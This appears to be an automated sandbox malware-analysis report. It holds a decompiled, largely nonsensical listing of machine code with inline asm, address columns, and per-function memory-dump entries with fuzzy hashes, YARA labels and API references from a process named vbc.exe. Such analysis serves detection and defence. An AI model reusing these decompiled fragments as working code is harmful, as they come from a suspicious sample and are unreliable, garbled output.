				 *_t282 =  *_t282 + _t282;
				_t283 = _t282 |  *_t282;
				 *__ebx =  *__ebx - _t283;
				 *_t283 =  *_t283 + _t283;
				_t284 = _t283 |  *_t283;
				_t615 = _t613 +  *__esi +  *__edi;
				 *((intOrPtr*)(_t284 + _t284)) =  *((intOrPtr*)(_t284 + _t284)) - _t284;
				 *_t615 =  *_t615 + _t547;
				 *_t615 =  *_t615 + _t284;
				ss = ss;
				 *0xa0000 =  *0xa0000 - _t284;
				_t616 = _t615 +  *__esi;
				 *__esi =  *__esi - _t284;
				 *_t284 =  *_t284 + _t284;
				_t285 = _t284 |  *_t284;
				_t549 = _t547 -  *__esi +  *_t285;
				 *_t285 =  *_t285 | _t285;
				 *__esi =  *__esi + _t285;
				asm("outsd");
				asm("insb");
				 *_t285 =  *_t285 + _t285;
				_push(es);
				 *__edi =  *__edi - _t285;
				 *_t285 =  *_t285 + _t285;
				_t287 = (_t285 |  *_t285) -  *__esi;
				 *_t616 =  *_t616 + _t287;
				 *_t287 =  *_t287 - _t549;
				 *_t287 =  *_t287 + _t287;
				_t288 = _t287 |  *_t287;
				_t550 = _t549 - _t616;
				if(_t550 >= 0) {
					L6:
					 *_t616 =  *_t616 + _t550;
					 *0x2a040000 =  *0x2a040000;
					 *_t288 =  *_t288 + _t288;
					goto L7;
				} else {
					 *_t288 =  *_t288 + _t288;
					_t288 = _t288 |  *(_t288 + 0x4000001);
					if(_t288 >= 0) {
						L7:
						asm("adc esi, [eax]");
						 *_t288 =  *_t288 + _t288;
						asm("adc [eax], al");
						 *_t288 =  *_t288 + _t288;
						 *_t288 =  *_t288 + _t288;
						 *_t550 = _t616 +  *_t550;
						_t680 =  *_t550;
						goto L8;
					} else {
						 *_t288 =  *_t288 + _t288;
						_t288 = _t288 |  *(_t288 + 0x4000002);
						if(_t288 >= 0) {
							L8:
							asm("adc [eax], eax");
							if(_t680 > 0) {
								 *_t288 =  *_t288 + _t288;
							}
							 *((intOrPtr*)(_t654 + _t662 * 2)) =  *((intOrPtr*)(_t654 + _t662 * 2)) + _t288;
							 *[cs:eax] =  *[cs:eax] + _t288;
							goto L11;
						} else {
							 *_t288 =  *_t288 + _t288;
							_t288 = _t288 |  *(_t288 + 0x4000003);
							if(_t288 >= 0) {
								L11:
								_t550 = _t550 |  *_t616;
								_t289 = _t288 -  *_t288;
								_push(es);
								_t616 = _t616 -  *_t524;
								 *_t550 =  *_t550 ^ _t289;
								 *_t289 =  *_t289 + _t616;
							} else {
								 *_t288 =  *_t288 + _t288;
								_t289 = _t288 |  *(_t288 + 0x4000004);
								if(_t289 < 0) {
									 *_t289 =  *_t289 + _t289;
									goto L6;
								}
							}
						}
					}
				}
				 *_t289 =  *_t289 + _t289;
				 *_t616 =  *_t616 + _t289;
				 *_t289 =  *_t289 + _t289;
				asm("adc [eax], eax");
				if( *_t289 > 0) {
					 *_t289 =  *_t289 + _t289;
				}
				_t290 = _t289 + 0x6f;
				asm("das");
				 *_t290 =  *_t290 + _t290;
				_t551 = _t550 |  *_t616;
				_t291 = _t290 -  *_t290;
				_push(es);
				_t617 = _t616 -  *_t524;
				 *_t551 =  *_t551 ^ _t291;
				 *_t291 =  *_t291 + _t617;
				 *_t291 =  *_t291 + _t291;
				 *_t524 =  *_t524 + _t291;
				 *_t291 =  *_t291 + _t291;
				asm("adc [eax], eax");
				if( *_t291 > 0) {
					 *_t291 =  *_t291 + _t291;
					_t291 = _t291 + 0x6f;
				}
				asm("outsd");
				 *_t291 =  *_t291 ^ _t291;
				 *_t617 =  *_t617 + _t551;
				_t552 = _t551 |  *_t524;
				 *_t657 =  *_t657 + _t291;
				_t618 = _t617 -  *_t524;
				 *_t552 =  *_t552 ^ _t291;
				 *_t291 =  *_t291 + _t618;
				 *_t291 =  *_t291 + _t291;
				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + _t291;
				 *_t552 =  *_t552 + _t618;
				 *((intOrPtr*)(_t657 + 4)) =  *((intOrPtr*)(_t657 + 4)) + _t524;
				 *_t291 =  *_t291 + _t291;
				_t292 = _t291 + 0x6f;
				 *_t292 =  *_t292 ^ _t292;
				 *_t618 =  *_t618 + _t552;
				_t553 = _t552 |  *_t524;
				 *_t657 =  *_t657 + _t292;
				_t619 = _t618 -  *_t524;
				 *_t553 =  *_t553 ^ _t292;
				 *_t292 = _t619 +  *_t292;
				 *_t292 =  *_t292 + _t292;
				 *0x110000 =  *0x110000 + _t292;
				if ( *0x110000 <= 0) goto L19;
				goto L17;
				 *_t522 =  *_t522 + _t522;
				_t292 = _t522 + 0x0000006f ^  *(_t522 + 0x6f);
				 *_t292 =  *_t292 + _t292;
				_t554 = _t553 |  *_t619;
				_t293 = _t292 -  *_t292;
				_push(es);
				_t620 = _t619 -  *_t524;
				 *_t620 =  *_t620 ^ _t293;
				 *((intOrPtr*)(_t293 + _t293)) =  *((intOrPtr*)(_t293 + _t293)) + _t524;
				 *_t293 =  *_t293 + _t293;
				_push(es);
				 *_t293 =  *_t293 + _t293;
				asm("adc [eax], eax");
				if( *_t293 > 0) {
					 *_t293 =  *_t293 + _t293;
					_t293 = _t293 + 0x14;
					 *_t524 =  *_t524 - _t620;
				}
				 *_t293 =  *_t293 + _t293;
				_t555 = _t554 |  *_t524;
				_pop(es);
				_t294 = _t293 - 0x21;
				if(_t294 >= 0) {
					 *_t294 =  *_t294 + _t294;
				}
				 *((intOrPtr*)(_t294 - 0x30)) =  *((intOrPtr*)(_t294 - 0x30)) + _t620;
			}

0x00db2050
0x00db2050
0x00db2050
0x00db2050
0x00db2052
0x00db2054
0x00db2055
0x00db2057
0x00db2059
0x00db205b
0x00db205d
0x00db205f
0x00db2060
0x00db2062
0x00db2064
0x00db2066
0x00db2068
0x00db206a
0x00db206c
0x00db206e
0x00db2070
0x00db2072
0x00db2073
0x00db2076
0x00db207a
0x00db207c
0x00db207e
0x00db2080
0x00db2082
0x00db2084
0x00db2085
0x00db2088
0x00db208a
0x00db208c
0x00db208d
0x00db2090
0x00db2092
0x00db2094
0x00db2098
0x00db209a
0x00db209c
0x00db209e
0x00db20a0
0x00db20a3
0x00db20a5
0x00db20a7
0x00db20a8
0x00db20ae
0x00db20b0
0x00db20b2
0x00db20b4
0x00db20b9
0x00db20bb
0x00db20bd
0x00db20bf
0x00db20c0
0x00db20c1
0x00db20c3
0x00db20c4
0x00db20c6
0x00db20ca
0x00db20cc
0x00db20ce
0x00db20d0
0x00db20d2
0x00db20d4
0x00db20d6
0x00db2101
0x00db2101
0x00db2103
0x00db210a
0x00000000
0x00db20d8
0x00db20d8
0x00db20da
0x00db20e0
0x00db210c
0x00db210c
0x00db210e
0x00db2110
0x00db2112
0x00db2114
0x00db2116
0x00db2116
0x00000000
0x00db20e2
0x00db20e2
0x00db20e4
0x00db20ea
0x00db2117
0x00db2117
0x00db2119
0x00db211b
0x00db211b
0x00db211c
0x00db211f
0x00000000
0x00db20ec
0x00db20ec
0x00db20ee
0x00db20f4
0x00db2122
0x00db2122
0x00db2124
0x00db2126
0x00db2127
0x00db2129
0x00db212b
0x00db20f6
0x00db20f6
0x00db20f8
0x00db20fe
0x00db2100
0x00000000
0x00db2100
0x00db20fe
0x00db20f4
0x00db20ea
0x00db20e0
0x00db212d
0x00db212f
0x00db2131
0x00db2133
0x00db2135
0x00db2137
0x00db2137
0x00db2139
0x00db213b
0x00db213c
0x00db213e
0x00db2140
0x00db2142
0x00db2143
0x00db2145
0x00db2147
0x00db2149
0x00db214b
0x00db214d
0x00db214f
0x00db2151
0x00db2153
0x00db2155
0x00db2155
0x00db2156
0x00db2157
0x00db2159
0x00db215b
0x00db215d
0x00db215f
0x00db2161
0x00db2163
0x00db2165
0x00db2167
0x00db216a
0x00db216c
0x00db216f
0x00db2171
0x00db2173
0x00db2175
0x00db2177
0x00db2179
0x00db217b
0x00db217d
0x00db217f
0x00db2181
0x00db2183
0x00db2189
0x00db2189
0x00db218b
0x00db218f
0x00db2190
0x00db2192
0x00db2194
0x00db2196
0x00db2197
0x00db2199
0x00db219b
0x00db219e
0x00db21a0
0x00db21a1
0x00db21a3
0x00db21a5
0x00db21a7
0x00db21a9
0x00db21ab
0x00db21ab
0x00db21ad
0x00db21af
0x00db21b1
0x00db21b2
0x00db21b4
0x00db21b6
0x00db21b6
0x00db21b7

Memory Dump Source

Source File: 00000004.00000002.2167594564.0000000000DB2000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000004.00000002.2167587997.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2167782949.0000000000E56000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63bd6e6c7ebd7e3c294fa47d1249a047d05896f4235337ab71d3f7e6d935368a
Instruction ID: a70af158418e0f8e6bed1565f304bca88de06ead4e3e7408fb409ecb058d836b
Opcode Fuzzy Hash: 63bd6e6c7ebd7e3c294fa47d1249a047d05896f4235337ab71d3f7e6d935368a
Instruction Fuzzy Hash: 6603006240E7C28FCB138B789CB16E17FB1AE5721471E49CBC4C18F4A3E219596AD772

Uniqueness

Uniqueness Score: -1.00%

Function 00DA286F, Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

?Z9, xrefs: 00DA2D04

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID: ?Z9
API String ID: 0-3813185722
Opcode ID: 88559b54f841d9ac3eb33c06dba09887f14397202cb6aa9b45f8f1dd3bfebbec
Instruction ID: ef36feaed8c6ad862695745b8a3ae0bdda3a249b069f8b40fe931e001bd50bda
Opcode Fuzzy Hash: 88559b54f841d9ac3eb33c06dba09887f14397202cb6aa9b45f8f1dd3bfebbec
Instruction Fuzzy Hash: 44514C71E012599BDB14CFAAD9806AEFBF2FF89304F24C56AD805A7205D7349E41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2880, Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

?Z9, xrefs: 00DA2D04

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID: ?Z9
API String ID: 0-3813185722
Opcode ID: 02ae121e50b685f008cae91c52d078eff092ba70fea83a9090ade7c0ed4ebd83
Instruction ID: b265e9062652d5abcf1d0ee06a03a55cf022a3c461cfa74c35f796ce79bf938b
Opcode Fuzzy Hash: 02ae121e50b685f008cae91c52d078eff092ba70fea83a9090ade7c0ed4ebd83
Instruction Fuzzy Hash: E5511B70E001198BDB14CFAAD9806AEFBF6FF89304F24C56AD419A7205D7349D42CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0053B5C0, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af26db36a0bb92ea39f77d1636fdfa6fe9d2520cb9861e28288701b32d378a5b
Instruction ID: 52b6aa332f8c95a8b7c4b3666cfbbc977fe163a9ce7d42de7808da2a27c6725e
Opcode Fuzzy Hash: af26db36a0bb92ea39f77d1636fdfa6fe9d2520cb9861e28288701b32d378a5b
Instruction Fuzzy Hash: 89713EB1D497948FD719CF668C542CAFFF7AFC5200F18C0EAD8485A256DB341A4A9F22

Uniqueness

Uniqueness Score: -1.00%

Function 00539278, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a36910c6945dc14b1904c8d9026d3c8997f487418eabf5b1c9b4d45bb4b32a
Instruction ID: 8b4d70d8dcb958204b9014e8e4456fcaf17139d90d1fa8d105da2d6a1dfe04cf
Opcode Fuzzy Hash: 06a36910c6945dc14b1904c8d9026d3c8997f487418eabf5b1c9b4d45bb4b32a
Instruction Fuzzy Hash: 3371D074E112099FCB48CFAAD58499EFBF1FF88310F14896AE419AB324D774AA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0053926A, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31894bb85e99470a5e0857bb218b7c53c49c40aa6aa3fb33a012e5deb5d7d44
Instruction ID: 9de5d8e0d1c0860846461b7ba842b66a300c5b4f3681b37e07c24cf3f9f8a91d
Opcode Fuzzy Hash: b31894bb85e99470a5e0857bb218b7c53c49c40aa6aa3fb33a012e5deb5d7d44
Instruction Fuzzy Hash: 5F71F074E152099FCB08CFA9D58499EFBF1FF89310F14896AE419AB361D770AA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00DA1E17, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3412b6164bad6208f24af011a0bb5619321cc4850ec0b3d2a83c5cc189fbf756
Instruction ID: e5b2a10476d847bb1e510074e9b9603db65068ca4adf4ca6ddef143ae6abaead
Opcode Fuzzy Hash: 3412b6164bad6208f24af011a0bb5619321cc4850ec0b3d2a83c5cc189fbf756
Instruction Fuzzy Hash: E3614A78E0521A8FCB04CFA9C4416EFFBF2AF89310F64D42AE915A7255D7349A41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA1E28, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64eaa10ac5fe04f11dbc33e66d6a8e6c42210f1a6105dc38269b8e9c1f50893a
Instruction ID: 20de8eb85aaae9ebfb86e4e71a53621b899e76ab0ee5e0c28ae5b7195f4cf550
Opcode Fuzzy Hash: 64eaa10ac5fe04f11dbc33e66d6a8e6c42210f1a6105dc38269b8e9c1f50893a
Instruction Fuzzy Hash: 3D615B78E0521A8FCB04CFA9C4416EFFBF6EF89310F64D429E915A7254D7349A418FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0053E830, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd0796a3c7431dcdc1c52159a59732d1a216a7d609530652fb0f81cacfe9b29
Instruction ID: 3e961b91468161e4f7d896285480dcb6e6bd4c8f372a31d0c7f7f6f6ec0d24ad
Opcode Fuzzy Hash: 4bd0796a3c7431dcdc1c52159a59732d1a216a7d609530652fb0f81cacfe9b29
Instruction Fuzzy Hash: 94710574E15219CFDB54CFA9D985B9EFBF2BB88300F1084A9D509AB394DB309E818F50

Uniqueness

Uniqueness Score: -1.00%

Function 0053A670, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7123c18b684439dc18d3bf0fada3576feb46fe42f5711fb78a2d9b456145056
Instruction ID: 4923f3671ed3fbb9fe9bad035ee1496172175358608bffa6aebd12f9dbd13a13
Opcode Fuzzy Hash: e7123c18b684439dc18d3bf0fada3576feb46fe42f5711fb78a2d9b456145056
Instruction Fuzzy Hash: 0561D274E19259CFCB08CFA9C9815DEFBF2FF88310F28946AD405B7224D3349A428B65

Uniqueness

Uniqueness Score: -1.00%

Function 0053A680, Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028fae7f0fa1e08954bda453361d647cc19008402b4dce529acab0c1ee772883
Instruction ID: 137714b430e3cb74105ba1b9051d78eb93814c58247c8afd444b4978fc60d00a
Opcode Fuzzy Hash: 028fae7f0fa1e08954bda453361d647cc19008402b4dce529acab0c1ee772883
Instruction Fuzzy Hash: 0C61C474E15219DFCB04CFA9C9815DEFBF2FB88310F24942AD415B7214D73499418B65

Uniqueness

Uniqueness Score: -1.00%

Function 0053E190, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db275d33ad88ad4a6e1a81c44fec1f6df3c735def3323b72f5d8702221b3c471
Instruction ID: ccc5c94635c3728c456e416ce2a7dfb8dfe439cf63497533cccb4caff38e0f62
Opcode Fuzzy Hash: db275d33ad88ad4a6e1a81c44fec1f6df3c735def3323b72f5d8702221b3c471
Instruction Fuzzy Hash: A751F574E11219CFDB54CFAAC881B9EBBF6BF88310F1480AAD508A7350DB349A81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0053A8B0, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a339cc0535b53f29893ababddec170295cf6c082c9607abbaeadb15e53a8924
Instruction ID: 9c84760ffda7285df054f1f6f57b00fe3f41f343ea416e83d689c314a53186bb
Opcode Fuzzy Hash: 1a339cc0535b53f29893ababddec170295cf6c082c9607abbaeadb15e53a8924
Instruction Fuzzy Hash: 694104B1E0560ADFCB04CFA9C5815AEFFF2BB89300F24D96AC455B7215E3349A429B91

Uniqueness

Uniqueness Score: -1.00%

Function 0053A8C0, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e77c3020b06ed03f5e41fff59e966854489354dc887f123bfb1c8839f06ca8c
Instruction ID: 73b5aaecd5aa72d706254346c30aaf15017bb004de1e1cbaf61fa55935c934d1
Opcode Fuzzy Hash: 2e77c3020b06ed03f5e41fff59e966854489354dc887f123bfb1c8839f06ca8c
Instruction Fuzzy Hash: 9F41E7B1E0560ADBCB04CFA5C5815AEFFF2FB88300F24D969C555B7214E3349A419B95

Uniqueness

Uniqueness Score: -1.00%

Function 0053A450, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fef605a6bbab7fa1e2ac8f8b6b2843cd56b19c173596d4acaf2dbb826634411
Instruction ID: 6a2b863bff5750603da74c71ea52a45ce7cc139396bdb9e337cf9f8812f0265d
Opcode Fuzzy Hash: 8fef605a6bbab7fa1e2ac8f8b6b2843cd56b19c173596d4acaf2dbb826634411
Instruction Fuzzy Hash: BF410670D0420A9FCF48CFAAC5845AEBBF2BF98300F24D46AC455E7255E6389A41CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0053A460, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb77020dfb0315e1dbcac16cab640ed5bd09be073863b7f0d3d9e9b0b8c1e0b
Instruction ID: 6225068f841f47db613edf55f6631369967ec1d55d35d72803edaf1e79a5d49e
Opcode Fuzzy Hash: 5bb77020dfb0315e1dbcac16cab640ed5bd09be073863b7f0d3d9e9b0b8c1e0b
Instruction Fuzzy Hash: C641F670E0020A9BCF48CFAAC5855AEFBF2BF98300F24D429C455B7255E7789A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA61A1, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef1bf2177957fffeaf6a0e83172d08b237ec545b86fe31bff1d53e8d4a08c6d
Instruction ID: f43381adcd7bed0f7311b250b76570118c718ed8f279c1ccf386c6cd178c424d
Opcode Fuzzy Hash: aef1bf2177957fffeaf6a0e83172d08b237ec545b86fe31bff1d53e8d4a08c6d
Instruction Fuzzy Hash: 8C215C70C05228DFDB008FA4D988BEDBBF1BB4B305F189469E546B7291C778CA45DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00DA61B0, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676317713d73fc6d5b52385caede17b231cdd148e33e9de7f5ed22b4fa4d131a
Instruction ID: b6d8b951a4e2f38557a4cb8f3258c552f74b95426064b18f7d3994440eb91fdb
Opcode Fuzzy Hash: 676317713d73fc6d5b52385caede17b231cdd148e33e9de7f5ed22b4fa4d131a
Instruction Fuzzy Hash: EE213970D05228DFDB048FA5D848BEEBBF5BB4B304F185429E456B3291C778C944DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00DA62D0, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a536fffb127a2b126e51d5d96df66cf7d97e009e9b3d00f72a745ea108e8dc
Instruction ID: 02bb8540e158cf246ecfb66f46fcb88aaf6e555fcdbb3e804c4d925e8af9153d
Opcode Fuzzy Hash: a0a536fffb127a2b126e51d5d96df66cf7d97e009e9b3d00f72a745ea108e8dc
Instruction Fuzzy Hash: 04114C34C0521CCBDB048FA5C588BEEBBF0AB0A305F1C9069D951B3291C778EA49DB78

Uniqueness

Uniqueness Score: -1.00%

Function 00DA62E0, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1abe4615aed55dce560adabad4fcaef7d81edab3650a41aab0213048aa93c5f2
Instruction ID: f2d4b5d6fff27f2a15f6a5b3de5238daf71eee0b8b434ed71fdcb92d92be0a89
Opcode Fuzzy Hash: 1abe4615aed55dce560adabad4fcaef7d81edab3650a41aab0213048aa93c5f2
Instruction Fuzzy Hash: 5A112730D04258CBDB048FA5C848BEEBAF1AB4A311F1C9069D451B3291C7789A44DB78

Uniqueness

Uniqueness Score: -1.00%

Function 0053AAB9, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c942b7544fb6a145175db29d4f0927b19a4f5eab756e1e54524acd625901e2
Instruction ID: 5c7827dcadddd24ba27133a04b763c2dad84e9cb2c43b8affd9053b05de409f9
Opcode Fuzzy Hash: a6c942b7544fb6a145175db29d4f0927b19a4f5eab756e1e54524acd625901e2
Instruction Fuzzy Hash: E5119071E116188BEB5CCF6BD84469EFAF3BFC8300F14C179C908A6268EB7405468F55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2868 Parent PID: 2672 vbc.exeCOMMON

Executed Functions

Function 00AC0048, Relevance: 1.8, Strings: 1, Instructions: 529COMMON

Download Yara Rule

Strings

%p, xrefs: 00AC0410

Memory Dump Source

Source File: 00000005.00000002.2380431592.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID:
String ID: %p
API String ID: 0-4180652836
Opcode ID: a2a1a467c147b019c42abce6192ac5cd49292f348c5b6dcc506add985c57ff36
Instruction ID: 662088d2bebafb4164a96cc0323695501d9563bfb9ec83de9f404b213a83f86c
Opcode Fuzzy Hash: a2a1a467c147b019c42abce6192ac5cd49292f348c5b6dcc506add985c57ff36
Instruction Fuzzy Hash: EA129034B04244CFDB159BB8C858F6E7BE6AF89314F16806AE506DB3A2DA34DC05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00457AA8, Relevance: 3.9, APIs: 2, Instructions: 928COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0f1fd45c90e2785e921c8143ec8978b1378a23d902d53268a05060ad2f79e8f2
Instruction ID: 69e002958283fb45b838541053933458a7c2f64792b91f0973278ededc72bc8d
Opcode Fuzzy Hash: 0f1fd45c90e2785e921c8143ec8978b1378a23d902d53268a05060ad2f79e8f2
Instruction Fuzzy Hash: 32A215B4A05228CFCB65DF20D8587ADB7BABF88305F1084EAD909A7350DB349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457AC9, Relevance: 3.6, APIs: 2, Instructions: 601COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 52d40735bdecb1f96843bfb58ef49094320581bd3cf639ce668a74f503fc13a6
Instruction ID: cc508a2719c02b9ede0f98d54d201ef2890bbe588462af7ff80740d773fddd98
Opcode Fuzzy Hash: 52d40735bdecb1f96843bfb58ef49094320581bd3cf639ce668a74f503fc13a6
Instruction Fuzzy Hash: 9A52F6B4A05228CFCB659F24D8586ADB7BABF48306F1084EAD509E7350CF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457B0E, Relevance: 3.6, APIs: 2, Instructions: 594COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c87da5a42ee940edb46e74e7dc0a456f1b41a70205dbf643aaf452e3fd8bf752
Instruction ID: 7e54cfe71e0544a5bccddef860706f8f9c9914fd9333a2bf1f0e470ef27ee321
Opcode Fuzzy Hash: c87da5a42ee940edb46e74e7dc0a456f1b41a70205dbf643aaf452e3fd8bf752
Instruction Fuzzy Hash: 4852F6B4A05228CFCB659F24D8586ADB7BABF48306F1084EAD509E7350CF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0068D85C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0068E279

Strings

X_, xrefs: 0068D85C

Memory Dump Source

Source File: 00000005.00000002.2380311151.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Similarity

API ID: QueryValue
String ID: X_
API String ID: 3660427363-1837567909
Opcode ID: fdd52d0f733b22cbad52766c1759117eb25156697ed2a221427e75ada918640e
Instruction ID: 3f02721f06e0adb0c3727592b146060edeb89e9570172e4ac7246edc2c985aa4
Opcode Fuzzy Hash: fdd52d0f733b22cbad52766c1759117eb25156697ed2a221427e75ada918640e
Instruction Fuzzy Hash: AE31CFB1D002589FCB20DF99C994ADEBBFABF48704F65852AE818AB310D7759905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00457B53, Relevance: 3.6, APIs: 2, Instructions: 587COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f2fef9d8ac53f947c60a30f6db33e12ce0581220e624d61ac835747f9b848c64
Instruction ID: e5ab421be5857de47946fec5448726d7a5875915c1bdb6b3b98fa69768ad3927
Opcode Fuzzy Hash: f2fef9d8ac53f947c60a30f6db33e12ce0581220e624d61ac835747f9b848c64
Instruction Fuzzy Hash: C652F6B4A05228CFCB659F24D8586ADB7BABF48306F1084EAD509E7350CF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457B98, Relevance: 3.6, APIs: 2, Instructions: 580COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
